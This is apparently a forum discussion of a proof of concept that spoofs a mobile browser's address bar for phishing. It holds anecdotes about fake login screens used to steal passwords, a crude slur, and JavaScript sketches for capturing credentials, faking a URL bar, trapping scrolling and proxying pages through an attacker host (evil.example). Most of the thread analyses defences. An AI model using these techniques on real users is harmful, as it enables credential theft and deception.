This specific example may be new, but the concept of fooling users with websites containing images of the system's own UI is not new --- for example, all the fake antivirus alert boxes. That had a relatively easy mitigation --- using a non-default appearance on your system (e.g. an XP-style "you have a virus!" dialog box image would just look silly if you weren't using XP with the default theme), but it seems the trend toward un-customisability is just going to make this even easier to exploit.
Of course, mobile browsers hiding important information and being even more un-customisable makes this worse.
Well, even I, as the creator of the inception bar, found myself accidentally using it!
When reading a product's documentation that has screenshots explaining how to do something, I've also accidentally tried to manipulate them instead of the actual dialogs. I'm sure others here have had similar experiences too.
Older school even -- instead of logging out of (real hardware) terminal sessions, exec a program which prints `login: ` and disables keyboard interrupts.
Read people's creds and store them somewhere, then issue a 'wrong password' message and exit, dropping the victim back to the real login prompt.
People will just assume they made a typo and continue as if nothing happened.
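The trick is tiny; here's a minimal sketch in JavaScript (names and messages are illustrative, not any historical program's actual code):

```javascript
// Fake-login sketch: record whatever was typed, then fail exactly like
// the real login program would, so the victim retries at the real prompt.
const stolen = []; // captured credentials, stored "somewhere"

function fakeLoginAttempt(username, password) {
  stolen.push({ username, password, when: Date.now() });
  // Mimic the real program's failure message; the caller would then
  // exit, dropping the victim back to the genuine login prompt.
  return "Login incorrect";
}

// The prompt itself would be printed verbatim, e.g.:
//   process.stdout.write("login: ");
console.log(fakeLoginAttempt("alice", "hunter2")); // prints "Login incorrect"
```

The essential property is that the failure path is byte-for-byte identical to the real program's, so a retry "just works".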
I've argued before for a genuine out-of-band independent display on machines which can only be written to by some very high privilege process.
Similarly, the iPhone X requires double-pressing the power button to complete a purchase using Face ID. Previously, with Touch ID, the authentication action itself was also sufficient to establish intent (placing the finger on the sensor). But with Face ID, any app could just pop up the purchase window and Face ID would see your face.
Incidentally, this is why Face ID is strictly worse than Touch ID in my opinion.
How is it worse? Touch ID's serving as both authentication and approval for payment was actually exploited in a scam. I don't see how this could be done with Face ID.
That’s fair. I never encountered anything like that. In my experience Touch ID was faster, more reliable, and more versatile (e.g. able to be activated with the phone lying on a table without peering over it with my face).
I happen to be in a situation where I have a phone with Face ID and one with Touch ID.
Touch ID with wet or slightly dirty fingers is not good. I've been doing some gardening over Easter and Touch ID is barely working because my fingers are rougher than they normally are.
Face ID on the other hand, works just as expected. It doesn't work optimally if I'm lying down, but that's not a problem for me personally.
Maybe it's up to the implementation? I've got an X, and the intent to pay pops up the native payment modal, which still requires you to double-press the power button AND to be authenticated. So what you describe never really happens.
Yes, but it isn't very effective: if the computer is left showing a full-screen browser that mimics the post-Ctrl-Alt-Del login screen, users will simply proceed directly to typing their credentials. An endless "logging in" dialog could then be presented, so that the user thinks it's a problem with the computer.
Hmm not if your users are trained to press Ctrl-Alt-Del again... The login screen would also allow them to order the OS to log off the current session too.
Mine would log you in. Of course the OS (Oasis) had a way to exec the login program and feed it the password. I stole the teacher’s password and then changed it.
He busted me by booting up the system from floppy, typing in the command to format the hard drive, and waiting for me to return to the lab after school. I asked him what he was doing and he said he had no choice but to reinstall from scratch because someone had changed the password. He then moved to hit the Enter key.
Not wanting my fellow students to lose their projects, I confessed. I logged him in and he changed the password.
He then gave my account admin privileges. I guess I had earned them.
I became the help desk. It seemed like an elevated status, but in reality it meant I got some of the drudgery piled onto me: password changes, adding students, disk quota increases, and such.
Back in the day I made a near-perfect copy of the RM (UK school IT supplier) login page in Visual Basic 6, and had it run on computers via a RunServices registry entry. Had a team of mates with custom floppy disks going around installing it on as many PCs as we could. It would log the supplied user/pw to disk, then display the "wrong password" error, then quit, exposing the real login screen.
What did you do with the passwords you captured? Sounds unethical... You'd definitely be facing criminal charges if you got caught doing this today I'd imagine.
Heh, I don't think so. Teachers don't like to send their pupils to court for silly things. They'd just be told not to do it again (and why) and probably get some detention and stuff.
Yeah it's not like you did anything illicit like change grades or wreak havoc on the network by mass formatting computers, unless you intentionally left out those parts ;)
That exists: look for 'trusted path'. It was a feature of compartmented mode workstation (CMW) operating systems like Trusted Solaris, and it lives on in the requirement to press Ctrl-Alt-Del to call up the Windows login prompt. In Trusted Solaris (TSOL) it was a dedicated area of the screen—along the bottom—where no user-mode process was allowed to write; the OS displayed a special symbol there (sort of like the padlock in a web browser) when the user was interacting directly with the OS. Some CMW systems even implemented that functionality in hardware, electronically compositing windows from different physical frame buffers onto the video display.

Ctrl-Alt-Del has roots close to the hardware, too: on the first IBM PC the BIOS keyboard interrupt handler watched for that specific combination and triggered a warm reboot, and on the AT and later machines the keyboard controller could pulse the CPU's reset line (the same chip that gated the A20 address line, which is probably why the two get conflated). Every subsequent PC-compatible machine has carried that machinery forward, though it's mostly vestigial today.
This was how I gained full sysadmin access to our college's VAX-11/780 minicomputer in late 1986. This machine ran pretty much everything from accounting to exam marking. There were three terminals on the "student" side of the computer room that the admins would log on to pretty regularly. I knocked up a script to run on these three terminals that looked exactly like the standard login and mailed me the credentials entered before displaying the standard "incorrect username/password" (and then silently logging off). The risk for me, had the IT team been a bit more on their game, was them spotting my account being logged into these three terminals for long periods of time with me nowhere to be seen :)
I kept silent about this until years afterwards for fear of being chucked out of college, which to be honest would've been a good thing seeing as the course was a waste of time.
Back in the day (1990), I found it amusing to edit the autoexec.bat during my first CS session and add "You have a virus... of the flu", signed with my handle.
Made me and my friend laugh.
The next session, the teacher asked us to sit at the same computers, and after 20 minutes a guy came to me and asked "Are you [handle]?"
Turns out the computers really did have viruses, and they thought it was me!
They threatened to expel me (more to frighten me, I think, since they had no proof), and made me the cleaning guy for the whole semester.
It gave me an undeserved reputation as the guy who hacked the university computers. And a better sense of caution.
In 1990 I also edited a friend's autoexec.bat to launch a quick basic script that would falsely check the disk for viruses and then prompt the user to delete their entire hard disk. Of course pressing "n" would print "y" on the screen and then display a fake progress bar along with a warning to not interrupt the operation in order to avoid disk damage.
I definitely had too much free time at the time. :)
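The key-swap is a one-liner; here's a JavaScript sketch of roughly how the prank could work (purely illustrative, not the original QuickBASIC):

```javascript
// Whatever the user answers, the "safe" key is echoed as the dangerous one.
function echoedAnswer(keyPressed) {
  // Pressing "n" (no) prints "y" on screen; everything else echoes as-is.
  return keyPressed.toLowerCase() === "n" ? "y" : keyPressed;
}

// A fake progress bar to sell the illusion while "deleting" nothing.
function progressBar(percent, width = 20) {
  const filled = Math.round((percent / 100) * width);
  return "[" + "#".repeat(filled) + "-".repeat(width - filled) + "] " + percent + "%";
}

console.log("Delete entire hard disk? (y/n): " + echoedAnswer("n"));
console.log(progressBar(50) + "  do not interrupt, or disk damage may occur!");
```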
In high school I replicated the entire login UI of NT LAN manager (I think it was called) and had it save the password and then crash the machine (via c:\con\con). Asked the teacher to login for something and tada, admin password.
If you ever wondered why you have to press ctrl-alt-del to log in, that is why (nobody ever fixed this for Linux).
It doesn't look like the implementation is any good though. First, you have to set it up manually. I've literally never seen anyone do that. Second, it works by killing X. Not exactly elegant. But most importantly you don't have to use the SAK to log in! That's kind of the whole point of it.
It should be "Press ctrl-alt-delete to log in", not "By the way you can press ctrl-alt-delete if you want" because then nobody will bother!
> Second, it works by killing X. Not exactly elegant.
It works by killing everything on that particular terminal, no matter if it's text based or graphical. That's the whole point: whatever spawns after that is created by the init system.
> But most importantly you don't have to use the SAK to log in! That's kind of the whole point of it.
> It should be "Press ctrl-alt-delete to log in", not "By the way you can press ctrl-alt-delete if you want" because then nobody will bother!
I can guarantee you, if I were to copy the design of the login screen that shows up after you press Ctrl-Alt-Del, 99.999% of people who don't work in IT wouldn't bat an eye and would enter their credentials straight away. It comes down to educating your users. If you don't explain to your users why they have to press it before logging in, they will write it off as random computer stuff they don't understand and only press it because they're prompted to. If next time around they aren't prompted, they won't care.
So it comes down to educating your users, and I could just as well train them to press Alt-Print-K before logging in, though I agree that a friendly reminder on the login screen is a plus.
In the office: add a screenshot of the Visual Studio startup splash screen to a dev's wallpaper and watch. The best moment is when they see Visual Studio apparently being the first thing to start after a system reboot.
The company where I first worked out of university had a custom which the CEO named ‘shemaling’. The company had quite strict security standards. It was encouraged that anyone who found an unlocked screen in the office would ‘shemale’ the wallpaper. It did the job. I never forgot again after being ’shemaled’ the first time.
I gay porned an entire company's computers after they refused to crack down on employees watching people being murdered all day. They threatened to fire me so I explained exactly why I had done this and that I would happily explain this at length in any subsequent employment tribunal. I kept my job and the management finally told everyone to stop watching people getting killed on company time.
My co-workers thought it hilarious to line up clips of people being run over by trains or having their throat cut, then tell unsuspecting people that they had something very important to show them. Management didn't like being bothered by people complaining about what they viewed as guys being guys. Until they got an eyeful of guys doing guys, that is.
At a previous job, we had a "pipi" mailing list (pee, in French), where people would send "I went to pee" from unlocked computers. The "victim" themselves would often be members of said mailing list. That worked quite well, so organically, the list ended up being used mainly for random jokes, news and stuff, rather than the "I went to pee" messages.
Funnily enough, it was four years ago, somewhere in continental Europe. Things were a bit freer there. I didn't stay there long. I have a lot more interesting stories from that place.
That's the same era as me (Windows 3.0 was released in 1990, 3.1 a couple of years later). I'm surprised your school let you have unfettered access to the DOS prompt - that would have gotten abused within minutes at our school. Even the BBC BASIC interpreter ended up getting removed from the network because people like myself would abuse the PC speaker (which, to be honest, was the extent of the mischief I'd cause).
Frankly, though, I preferred the actual BBC Micros and Amigas that those IBMs were meant to replace.
Someone I know would constantly leave a macbook unlocked, so I prepared a script that would turn down the volume, whisper the owner's name, open weird sfw pictures online and other mildly annoying things, but not very often (like once a week).
This was meant as a joke, and I never actually went through with it. I know the person very well, but it still felt douchebaggy. The idea was to make an app file, save it to some seemingly legitimate folder, and add it to the autostart list.
The trick to hide the thing was to drag and drop Safari's logo onto it, and naming the app "Safan": it almost goes unnoticed when checking the Activity Monitor, thanks to the system font's proportions.
Blurred lines aside, for posterity you could name it "Safari Auto-Update Utility" and use an app icon that has the Safari logo coupled with a cog wheel or so.
I thought of something like that, but then the user could kill it as a precaution since an auto-update utility or any other secondary application can be temporarily disabled. Killing "Safari", on the other hand, would terminate everything the user's currently doing in it.
I guess I could have named it Disk Memory Manager or some other important-sounding thing.
I have an unquantified theory that the number of users who can distinguish a Windows 7/8/10 dialog box presented directly by the operating system from an image of one inside a browser, served from an external HTTP/HTTPS server, is diminishing greatly every year.
Last time I was in Davis CA, someone was trying to get me to sign up to their charity. They had an iPad, and were adamant that the padlock on the screen proved it was secure.
I couldn’t convince them that it was just a picture, and that I could fake it if I wanted to.
Which have lower overall usage of the proprietary Chrome browser, as well.
Firefox is the pre-install default for most distros, and only Chromium is provided in default repos.
They're also significantly more likely to use some form of ad and JS blocking.
So until the appearance changes based on the UA and system theme (and maybe can read bookmarks and plugins), this trick mostly affects mobile Chrome users.
Prolly need some sort of ML to parse every image used on the device and tag potentially dangerous ones. Wouldn't be too expensive on devices with tensor units...
Apparently Apple already reports your offensive photos; can't imagine why browsing should be treated differently.
>> This analysis generally happens inside a sandbox, and very little of what the systems determine makes it outside of that sandbox. There are special exceptions, of course, for things like child pornography, for which very special classifiers have been created and which are specifically permitted to reach outside that sandbox.
Unsure what TechCrunch's source for this is, but it kinda makes sense.
With a little polishing this would be quite the "exploit" - trap the user in your fake browser, actually load pages that are entered into the fake URL bar, replace content only on certain patterns...
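The fake bar itself needs nothing exotic: it's ordinary HTML/CSS pinned to the top of the viewport. A rough JavaScript sketch (colors, sizes, and the displayed host are my guesses, not the proof-of-concept's actual markup):

```javascript
// Generate a lookalike URL bar as an HTML string. A real attack would
// match the victim's browser/OS theme; this one is deliberately generic.
function fakeUrlBar(displayedHost) {
  return `
    <div style="position:fixed; top:0; left:0; right:0; height:48px;
                background:#f1f3f4; display:flex; align-items:center;
                font-family:sans-serif; z-index:9999;">
      <span style="color:green; margin:0 8px;">&#128274;</span>
      <span>${displayedHost}</span>
    </div>`;
}

// The page would insert this at document top, then hide the real bar by
// getting the user to scroll (the "scroll jail" part of the attack).
console.log(fakeUrlBar("hsbc.com").includes("hsbc.com")); // prints true
```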
The only solution here is a proper line of death [0]. It defeats the purpose of the LoD when it dynamically shrinks from user action.
Fun fact, subway systems have been using this concept for decades.
Joking aside, "line of death" is easily understood, but I'd never heard the name before. Now that it has a (perfect) name I will never forget it, and that's the importance of giving technology a fitting name.

My biggest pet peeve in modern UI is the hamburger menu icon. Three horizontal lines do not, in any way, indicate to the user that menu options lie behind them... and the name is downright awful. We replaced a perfect icon at the time, the "gear" (a gear references an engine, so users looking to change settings understood the analogy), but the hamburger menu tried to remove the "settings" idea and instead encompass navigation, settings, preferences, and operations in one menu icon. In my opinion it failed, but it's now so ubiquitous most people are fine with it.
The hamburger is actually a simplification of the original icon, which looked like a pop-up menu, and I think that's why it was acceptable to most people during the transition period.
The challenge is preserving the ability for content to control all the pixels; without it, the content ecosystem ends up developing single-purpose, generally crappy apps, which isn't necessarily better either...
I'm not sure it is the only solution either - what about "secure attention key" type ways to get the system's attention (in this case the browser's), bypassing any content interception? For example, what if there was a key combo guaranteed to always bring in the browser UI, and typing that key combo was necessary before inputting any password field?
Alternatively, the reliance on browser password management could provide some security if it can be trusted to always work...
Those are some good ideas too - "only solution" was a bit hyperbolic - but I do think our options are limited, especially on mobile.
The Secure Attention Key is interesting, but would need the user to know you press it. And on mobile, it would probably need to be a dedicated button on the device, since I could just fake the on screen keyboard too.
Password manager auto-fill failing would clue a savvy user that something was wrong, but I suspect many would just assume it's a glitch and manually enter their credentials.
I saw a reply in another thread suggesting customizable browser background images for the UI bar, which a website would have no way of replicating. In my opinion that's probably the best approach, although it might mean throwing away sites' ability to set the background color of the UI to match their theme (arguably losing nothing of value :).
With the use of gesture controls and swipe-up menus and "soft keys", etc, why not put in something like the "pie control" apps on Android, where the OS controls one part and the app controls another?
Consider a semi-configurable universal menu with a well defined access method, where you always can back out of the app, and in the case of browsers also have guaranteed access to switching tabs and accessing options, etc.
This gives me an idea... Even in fullscreen, I believe hovering the mouse near the top of the screen will also bring back some controls into view, but temporarily... So there's already some kind of "peek mode" for the controls... Entering this mode while typing a password in a standard password input field might make sense!
In Chrome beta 74, the count is in the bottom toolbar, so a variant of this attack that were UA-aware might have an even easier time. (The padlock is no longer green, either, and the leading https:// is omitted.)
On the other hand, scrolling to the very top of the page reveals the original address bar.
A possible mitigation would be to use a custom background or gradient for the bar that a web page can't guess. I'd be tempted to suggest the Google account's picture (if Chrome is logged in), but I don't know how safe that is from cross-site shenanigans.
I can't help but think that this was made possible by the complete collapse in common UI standards. 'Apps' have stopped being OS-toolkit apps and moved onto the web, and of course each designer needs to have their own special on-brand widget style. This has leaked onto the few remaining desktop apps: Chrome rejects the standard Mac OS widgets and reimplements everything, from buttons to the print dialog. Spotify does its own thing. And lest we think Apple has much respect for UX, iTunes is a mess. I genuinely can't use it.
The result is that users have been trained not to expect consistent UI paradigms. Every UI is hunt-and-peck. And that paves the way for this kind of exploit.
I don’t see what relation this rant has to the OP. Surely the issue here has nothing to do with the UI displayed and everything to do with the fact that it is possible to fake the browser UI. Even if Chrome were using traditional controls on a desktop, one could imagine an exploit where clicking a malicious link puts the browser in full-screen mode (most browsers only accept being put in full-screen mode from event handlers for user interactions like clicking) and displays a fake browser UI inside.
This was anticipated and partly avoided by a reasonably large modal which pops up to tell you you’re in full screen mode, and disappears after a few seconds.
Another similar exploit on desktop was to set the cursor of the page to be a very large image which would overlay the browser chrome and put some fake information there.
The issue on mobile could perhaps be reduced by having some amount of UI that doesn’t go away (Safari does this in portrait mode). Another help could be to not make the UI disappear (or to make it reappear) when this kind of scrolling-an-iframe situation arises.
Um, what? Standardization of UI is what makes this type of thing feasible large-scale, not the collapse of standardization.
Even just in this case - making it look like Chrome mobile results in a different bar than Firefox mobile. If they converge more though it'd take less effort to hit more people.
> 'Apps' have stopped being OS-toolkit apps and moved onto the web, and of course each designer needs to have their own special on-brand widget style.
Which is also why they are so abominably large. Picking on Skype, though they are by no means the only or the worst offender: the Android app is 71MB. There is no sane reason it needs to be that large except for all of the custom assets and custom widgets.
Using Firefox for Android: if I open the page and scroll down, the address bar becomes invisible and the HSBC bar shows up. If I keep scrolling down, I just see HSBC. The moment I scroll up, the original address bar is shown, and even if I keep scrolling down, the bar does not disappear.
Edit: it's happening kind of randomly. 1 time it happens, 3 times it doesn't...
Using Firefox Beta for Android v67.0b9, I see the HSBC address bar as a second address bar below the real one. It remains in place as I scroll, although a couple of times it disappeared.
Also this version wouldn't fool me because it says I have 26 tabs open. I'm used to the infinity symbol there!
Using Firefox 66.0.2 on Android as well. Pretty much the same behavior here, except that it does not look random at all:
- at the top of the page, if I scroll, the address bar disappears;
- as soon as the fake HSBC bar appears, the real address bar comes back;
- both of them remain here until I reload the page.
It looks as if the use of CSS position: fixed forces the Firefox address bar to be visible. Which, given the context, looks like a really good thing!
If Firefox doesn't trust elements with position: fixed, one could use position: absolute or even position: static (the default value) instead and move the element when scrolling.
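If position: fixed is what tips Firefox off, the workaround described above would look roughly like this (a sketch; `bar` is a hypothetical element, and the DOM wiring is left in comments):

```javascript
// An absolutely positioned element lives in document coordinates, so to
// appear pinned at a given viewport offset it must track the scroll.
function absoluteTopFor(scrollY, desiredViewportTop = 0) {
  return scrollY + desiredViewportTop;
}

// In a browser this would be wired up roughly as:
//   window.addEventListener("scroll", () => {
//     bar.style.top = absoluteTopFor(window.scrollY) + "px";
//   });
// The visible lag between scroll and reposition is one way a user
// might notice the bar isn't real.

console.log(absoluteTopFor(250)); // prints 250
```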
Back in the day you used to be able to get people to click a series of sharing dialogs with fake iframe overlays. People were abusing it to get insanely viral posts shared by millions.
This worked brilliantly on my Chime Android, and I'm quite surprised the scroll-jail trick worked too.
I suppose the author just wanted a quick PoC, but with enough work one could mimic an interactive browser address bar, including the menu with refresh, bookmark, etc., and even the HTTPS padlock with its security information. Since some browser UIs are themselves built with CSS, one could easily copy/paste from the browser itself.
That’s because the site messes with the scrolling in an attempt to prevent the top chrome from coming back, which unfortunately (or fortunately?) doesn’t do anything because Safari refuses to hide it.
Yeah, the scrolling is so janky on the page, I thought my iPad wasn’t properly responding to multitouch input for a moment... Then I opened the HN discussion and smooth, buttery scrolling (tm) was back. Lesson: don’t hijack scrolling behavior, it’s awful. (Very smart hack though.)
> With a little more effort, the page could detect which browser it’s in, and forge an inception bar for that browser.
It’s just a proof of concept, focusing on one browser in one operating system. It would be interesting to see how well this could be done on iOS. The real host name is always shown at the top of the page, so it’s not going to be perfect.
Interesting! So it does. However Firefox does hide the URL bar on other pages! I'll try to figure out what the logic is in Firefox, and whether there's an equivalent trick to hide the URL bar ...
Just to be clear, you're referring to real Firefox address bar (pointing to TFA), not the fake Chrome address bar (pointing to hsbc.com). So yes, in this case Firefox has (accidentally?) somewhat thwarted this attack vector.
I noticed this as well. I'm wondering if FF is smart enough to always show its own URL bar when a CSS element is pinned to the top of the viewport? Gotta do more testing ...
Safari doesn’t hide the URL bar when you employ the “scroll jail” technique he described. Scrolling also doesn’t feel right, because he omitted the CSS property for inertial scrolling (`-webkit-overflow-scrolling: touch`) in his “scroll jail.”
Whenever I’m looking at an iPhone screenshot someone posted on social media on my iPhone, I try to navigate using the buttons in the image. There ought to be a long German word for that experience.
Yahoo actually tried to do this in 2015 with an internal initiative called “Silver Search”, trying to trick Firefox users into using their own Yahoo-powered omnibox. I was fucking livid when I found out about it and complained.
I'm not doubting the concerns raised but the fake failed in many ways for me on my phone with the latest chrome. It didn't appear. Then when it did it appeared below the existing bar.
But I guess you just need it to work often enough.
It's like the fake "Allow Notification" dialogs on some sites. They look off to pretty much anyone paying attention, but their target market probably isn't people paying attention
It can be more sinister. Although I am sure the other answers are right in some circumstances, I was curious a while ago, so I actually clicked one.
Whether you click allow or deny, it shot off a network request to a third party domain. This lets the third party know your browser's user agent, and if they have an exploit for your browser they will send a payload that compromises the browser with the intent of installing an adware extension.
It failed to install on the machine I made for it (Ubuntu18/Chrome) but it did manage to navigate me to an advert from the click.
It’s the same reason many iPhone apps implement their own dialogues to ask about allowing notifications. If the user chooses ‘Deny’ in the system-provided one, the app can never ask again and the only way to turn notifications on later is to have the user go digging around in the Settings app, which few people will bother to do.
I take great pleasure in choosing ‘Allow’ in those custom dialogues and then ‘Deny’ when the native one pops up immediately afterwards.
FYI this isn’t occurring on chrome or safari on iOS. As soon as the fake bar appears the page stops scrolling normally - the scrolling inertia stops so that I can scroll but not “toss” the page, and the real address bar no longer hides. I wonder if this is a deliberate mitigation, or an accident?
I understand why this was a problem in 1995, but honestly, in 2019, with image recognition technology as advanced as it is now – especially due to efforts by Google – why can't browsers detect this? Surely "does this rectangle look vaguely like a URL bar" is an easier problem to solve than "is this a photograph of a cat"?
Sure, image recognition is CPU intensive, but even just checking once every 5 seconds or so would be enough to prevent this sort of attack and pop up a big "you are being phished" warning. And 99.99% of what occupies that UI real estate looks sufficiently unlike a search bar that a low-cost recognizer should be able to rule out phishing for normal sites fairly quickly.
What am I missing? Has this approach been tried and rejected? Is image recognition of fairly static, flat, 2D, geometric shapes actually far more CPU-intensive than I imagine?
MobileSafari has an interesting feature that your idea reminded me of: it tries to detect when a site using the Fullscreen API presents an iOS keyboard-lookalike through the location and frequency of your taps on that side of the screen. I’ve gotten the warning when doing something else and was impressed they thought of it.
While this is true, it's usually referring to algorithmically chosen adversarial inputs. On the other hand, it's a lot harder to trick both the browser's image recognition and the human operator's visual senses with the same UI.
This is actually one of the core goals of adversarial machine learning: crafting inputs that trick a machine but look indistinguishable to a human [1].
Thanks, and yes! I was originally thinking "pull-to-refresh", but since your comment, I've enhanced the phishing with another trick: a large buffer at the top of the scroll jail, which prevents the user from reaching the top, and thus prevents the user from using "pull-to-refresh". Now, the only way I know to reliably get out of the page is to move to another app, then back to Chrome - this seems to cause it to re-display the true URL bar.
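In JavaScript terms, the buffer trick might look something like this (a sketch under my own assumptions about the page, not the author's actual code):

```javascript
// Scroll-jail sketch: content sits inside an inner scrollable element,
// with a large dead zone above it so the user can never reach the very
// top -- reaching scrollTop 0 is what would allow pull-to-refresh.
const BUFFER_PX = 2000; // dead space above the real content

function clampedScrollTop(requestedScrollTop) {
  // Never let the inner container scroll all the way up.
  return Math.max(requestedScrollTop, BUFFER_PX / 2);
}

// Applied from a scroll handler on the hypothetical jail element:
//   jail.addEventListener("scroll", () => {
//     jail.scrollTop = clampedScrollTop(jail.scrollTop);
//   });

console.log(clampedScrollTop(0)); // prints 1000
```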
This is why I think removing the physical (as in, below the screen --- whether they're capacitive or actual pushbuttons isn't the point here) buttons from Android devices is a horrible idea; a webpage can mess around with what's on the screen, but it can't stop the user pressing the physical menu button and choosing Refresh from there.
By "hard refresh" I took that to mean using the keyboard to forcibly reload the page and all assets, e.g. CTRL-F5 on Windows. Of course, the average user probably doesn't use keyboard commands, or even know this one exists.
FWIW, opening that link in mobile Safari shows a large “X” in the top left of the screen, and trying to scroll sets off the “it looks like you’re typing in fullscreen” warning.
At least on my computer there is a permission dialog for the fullscreen API. However, if document scripting is disabled (which is what I have by default anyway), the link doesn't do any of that. (I also use an unusual window layout, so if someone tries to spoof the window layout, it is likely that I would easily see the problem immediately anyway.)
A recent example that I've been seeing more and more is pages taking over some system keyboard shortcuts. I've seen pages hijack Command-F and use their own search interface instead of the browser's. I've found utilities to stop pages messing with copy/paste, but is there a way to block pages from taking over keyboard shortcuts in Chrome?
I recently helped someone install VLC. I googled "VLC download" (relying on Google) and then clicked through the clearly labelled download links. I must have accidentally clicked a link twice, because two copies started downloading. The more recent one had finished, so I literally started opening the executable. The only thing that stopped me was that it was called vlc-streaming or something, and the one next to it was still downloading, slowly.
That's because it was a download triggered by vlc's ad partner. It wasn't VLC.
This wasn't some shady part of the Internet. I was livid.
If they had given it the same name, size, and approximate download speed as the file I was downloading, I would have had zero way to determine this. Everyone has accidentally started two downloads when they just wanted one copy.
Unreal that this could happen on an official site. (And that it basically tricked me.)
I’m convinced to use the Windows Store or Chocolatey to install stuff for this reason. Paint.net is practically impossible to download from their ad-infested site.
Slightly OT, but it's HTTPS so it must be safe, right?
It's an example of why the "HTTPS everywhere" push annoys me: it gives a false sense of security. Security resources would be better spent elsewhere.
Also, back on topic: Google should stop blindly handing the wheel to "designers". Oversimplification instead of properly educating people leads to this crap.
HTTPS everywhere is a good thing. HTTPS was never about protecting against phishing, and has never protected you against phishing. There is no way to educate people out of phishing; the only way to protect against it is U2F. Education against phishing is not very effective, and only works short term.
Exactly, though I disagree on education. People can and must be taught about security (not just phishing). But that also means some standardization of the browser UI, and not trying to make it "seamless" and "transparent". This exploit is the result of deliberately blurring the lines between traditional apps and web apps. The threat models being very different, that's not a good idea.
HTTPS is one part of a whole, and pushing it so hard makes people (even tech-savvy ones) focus too much on it. How many CTOs are happy just putting HTTPS on their website so they can tick the security checkbox?
Which is arguably why the push is increasingly to "Not Secure" and "Is Maybe Secure" notifications over "Is Secure". Maybe that will help more end users.
This fake bar reminds me of the fake address bar Google displays in the AMP viewer, and the efforts it takes to replace URLs in the address bar instead of just letting the user visit the target site.
Another example where Chrome prefers usability over security is autofill, where a user can accidentally share more personal information than they wish.
I figured out something kinda like this but worse. I don't really know how to make it public though because it hits so many different pieces of software that I struggle to see how I could give enough warning to all of them. Thousands of entities, really.
If someone else has dealt with this please reach out I want to make it public in a safe way.
I'll worry about this when I stop getting emails from my banks and credit card companies that look like cheesy phishing emails and ask me to click the link and log in.
My point is that none of this stuff matters if major corporations continue to send out terrible emails that basically encourage consumers to engage in risky behavior.
Reading this reminded me of the time in the 80s when I discovered hex editors and changed COMMAND.COM to reverse every DOS command. So to get a directory listing you had to type RID, COPY became YPOC, etc. The error message was !sdrawkcaB. I know I'm no hacker but everyone else thought I was.
Perhaps a solution would be to allow the browser to share a "fingerprint" with specific websites. To make a trusted connection. The website would know if a trusted connection exists for the user and deny all login attempts coming from unauthorized fingerprints.
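Server-side, that proposal amounts to a per-user allow-list of trusted fingerprints. A rough sketch (all names hypothetical, and setting aside the hard problem of making the fingerprint unspoofable):

```javascript
// Hypothetical per-user allow-list of trusted browser fingerprints.
const trustedFingerprints = new Map(); // user -> Set of fingerprint strings

// Called once when the user establishes a trusted connection
// (e.g. after an out-of-band confirmation step).
function trustFingerprint(user, fp) {
  if (!trustedFingerprints.has(user)) {
    trustedFingerprints.set(user, new Set());
  }
  trustedFingerprints.get(user).add(fp);
}

// Deny any login attempt whose fingerprint was never registered.
function loginAllowed(user, fp) {
  const fps = trustedFingerprints.get(user);
  return fps !== undefined && fps.has(fp);
}
```

The catch is that anything the browser can send, a phishing proxy can replay, so this only raises the bar unless the credential is bound to the origin the way U2F/WebAuthn credentials are.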
IMO, the collapsed address bar is the most pragmatic fix to this issue. (The other fixes are options that users would have to opt in to, rather than being fixed at the source - i.e. Chrome.)
I tried to exploit mobile browsers' hiding of the address bar on scroll to get more screen real estate for a web game/app, but most browsers make it very hard.
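For what it's worth, the trick relies on the page being scrollable at all: the browser only collapses its real bar once there's somewhere to scroll to. A minimal sketch (assuming Chrome-on-Android behavior, with 56px as a guessed bar height):

```javascript
// The page must be at least one bar-height taller than the viewport,
// or the browser has no reason to collapse its URL bar on scroll.
function minPageHeight(viewportHeight, urlBarHeight) {
  return viewportHeight + urlBarHeight + 1; // +1px guarantees scrollability
}

if (typeof document !== "undefined") {
  // Force the page tall enough, then nudge the scroll position so the
  // browser hides its own bar (leaving room at the top for a fake one).
  document.body.style.minHeight =
    minPageHeight(window.innerHeight, 56) + "px"; // 56px: assumed bar height
  window.scrollTo(0, 1);
}
```

As the reply below this comment notes, the illusion is fragile precisely because scrolling back to the very top brings the real bar back.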
The illusion is almost perfect. However, it breaks when you scroll back to the very top: the real address bar reappears on top and stays there even when you scroll back down. This is with Chrome 73.
I wrote a clone of the Novell network login screen in QuickBASIC and dumped passwords to a file.
Got dozens of students' passwords and did nothing with them...
I was 13 years old...
In principle, it's not a mitigation - I was just too lazy to forge an interactive URL bar! You could make one that acts just like the Chrome URL bar but, e.g., acts as a MITM.
At first I thought you wouldn't be able to stay "in the middle", because you'd have to redirect to the typed address. You can't AJAX it in because of CORS.
But you could go to your own host and have your server sit in the middle. The user wouldn't be logged in, since cookies wouldn't be sent. But maybe they would login through your proxy.
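The "server in the middle" approach is basically a rewriting reverse proxy; the essential step is rewriting every link in the fetched page so the victim never leaves the attacker's host. A toy sketch of just that step, with `evil.example` as a hypothetical attacker domain:

```javascript
// Hypothetical attacker origin that fronts the proxy.
const PROXY_ORIGIN = "https://evil.example";

// Rewrite every absolute link to the target site so it routes back
// through the proxy, e.g.
//   https://bank.example/login -> https://evil.example/p/login
function rewriteLinks(html, targetOrigin) {
  return html.split(targetOrigin).join(PROXY_ORIGIN + "/p");
}
```

And since the victim's cookies are scoped to the real site's origin, they're never sent to the proxy, which is exactly why the victim starts logged out and may type their credentials straight into it.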
Yuck. I have a custom UI on mobile so it's out of place to see white.
I also just suffered from a bug causing images to half-load (no idea why; it seems new).
While trying to get the images to load, I got the fake tab-count portion to load, and then immediately tried changing tabs... with the fake button I had just made appear.
I found a fix for this problem, by accident.
I use the Blokada apk on Android (not the Google Play Store version, the good one, if that makes a difference), and when first visiting the page I didn't see what the hell you were talking about: the inception URL bar never showed up for me. When most things don't load or don't act as they're supposed to, the first thing I do is disable Blokada and reload. Once I did, it showed up. (Pretty cool little discovery, btw, good job.)
The article indicates it's not supposed to. It's a quick and dirty proof of concept, working in one environment (Android/Chrome), with a screenshotted fake header. Just enough to prove the point.
Safari has prevented websites from accessing nonstandard fonts as an anti-fingerprinting technique for a while now, so this script doesn't quite work there.
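For anyone curious how pages usually detect font availability in the first place (and hence what Safari's mitigation breaks), the common trick is comparing measured text widths. A sketch, assuming the spoof needs Roboto to match Chrome's UI typeface:

```javascript
// If the candidate font is available, text measured with it will
// (almost always) differ in width from the generic fallback alone.
function fontDiffers(widthWithCandidate, widthFallbackOnly) {
  return widthWithCandidate !== widthFallbackOnly;
}

if (typeof document !== "undefined") {
  const ctx = document.createElement("canvas").getContext("2d");
  const sample = "mmmmmmmmmm"; // wide glyphs exaggerate the difference
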